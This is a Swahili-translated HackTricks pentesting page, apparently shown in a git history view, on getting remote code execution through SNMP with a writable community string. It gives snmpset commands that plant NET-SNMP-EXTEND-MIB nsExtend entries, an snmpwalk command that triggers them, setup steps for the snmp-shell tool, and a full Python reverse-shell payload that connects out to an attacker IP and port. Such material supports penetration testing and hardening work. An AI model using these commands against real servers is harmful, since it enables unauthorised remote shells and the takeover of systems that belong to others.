hacktricks/network-services-pentesting/pentesting-snmp/snmp-rce.md

74 lines
5 KiB
Markdown
Raw Normal View History

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2022-04-28 16:01:33 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-02-03 16:02:14 +00:00
# SNMP RCE
2022-04-28 16:01:33 +00:00
SNMP inaweza kutumiwa na mshambuliaji ikiwa msimamizi atapuuzia mbali usanidi wake wa default kwenye kifaa au seva. Kwa **kuitumia jamii ya SNMP yenye ruhusa za kuandika (rwcommunity)** kwenye mfumo wa uendeshaji wa Linux, mshambuliaji anaweza kutekeleza amri kwenye seva.
2021-04-19 17:04:40 +00:00
## Kuongeza Huduma kwa Amri za Ziada
2021-04-19 17:04:40 +00:00
Ili kuongeza huduma za SNMP na kuongeza amri za ziada, inawezekana kuongeza **safu mpya kwenye meza ya "nsExtendObjects"**. Hii inaweza kufanywa kwa kutumia amri ya `snmpset` na kutoa vigezo vinavyohitajika, ikiwa ni pamoja na njia kamili ya faili inayoweza kutekelezwa na amri itakayotekelezwa:
2021-04-19 17:04:40 +00:00
```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'
```
## Kuingiza Amri kwa Utekelezaji
2021-04-19 17:04:40 +00:00
Kuingiza amri zinazopaswa kukimbia kwenye huduma ya SNMP kunahitaji kuwepo na uwezo wa kutekeleza faili la binary/script lililotajwa. **`NET-SNMP-EXTEND-MIB`** inahitaji kutoa njia kamili ya faili la kutekeleza.
2021-04-19 17:04:40 +00:00
Ili kuthibitisha utekelezaji wa amri iliyoungizwa, amri ya `snmpwalk` inaweza kutumika kuorodhesha huduma ya SNMP. **matokeo yataonyesha amri na maelezo yake yanayohusiana**, ikiwa ni pamoja na njia kamili:
2021-04-19 17:04:40 +00:00
```bash
snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
```
## Running the Injected Commands
2021-04-19 17:04:40 +00:00
Wakati **amri iliyowekwa inasomwa, inatekelezwa**. Tabia hii inajulikana kama **`run-on-read()`** Utekelezaji wa amri unaweza kuonekana wakati wa kusoma snmpwalk.
2021-04-19 17:04:40 +00:00
### Gaining Server Shell with SNMP
2021-04-19 17:04:40 +00:00
Ili kupata udhibiti wa seva na kupata shell ya seva, skripti ya python iliyotengenezwa na mxrch inaweza kutumika kutoka [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git).
2021-04-19 17:04:40 +00:00
Vinginevyo, shell ya kurudi inaweza kuundwa kwa mikono kwa kuingiza amri maalum katika SNMP. Amri hii, inayosababishwa na snmpwalk, inaanzisha muunganisho wa shell ya kurudi kwa mashine ya mshambuliaji, ikiruhusu udhibiti wa mashine ya mwathirika. Unaweza kufunga mahitaji ya awali ili kuendesha hii:
2021-04-19 17:04:40 +00:00
```bash
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
```
Au shell ya kurudi:
2021-04-19 17:04:40 +00:00
```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
```
## References
2024-02-03 16:02:14 +00:00
* [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)
2022-04-28 16:01:33 +00:00
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
<details>
2022-04-28 16:01:33 +00:00
<summary>Support HackTricks</summary>
2022-04-28 16:01:33 +00:00
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
{% endhint %}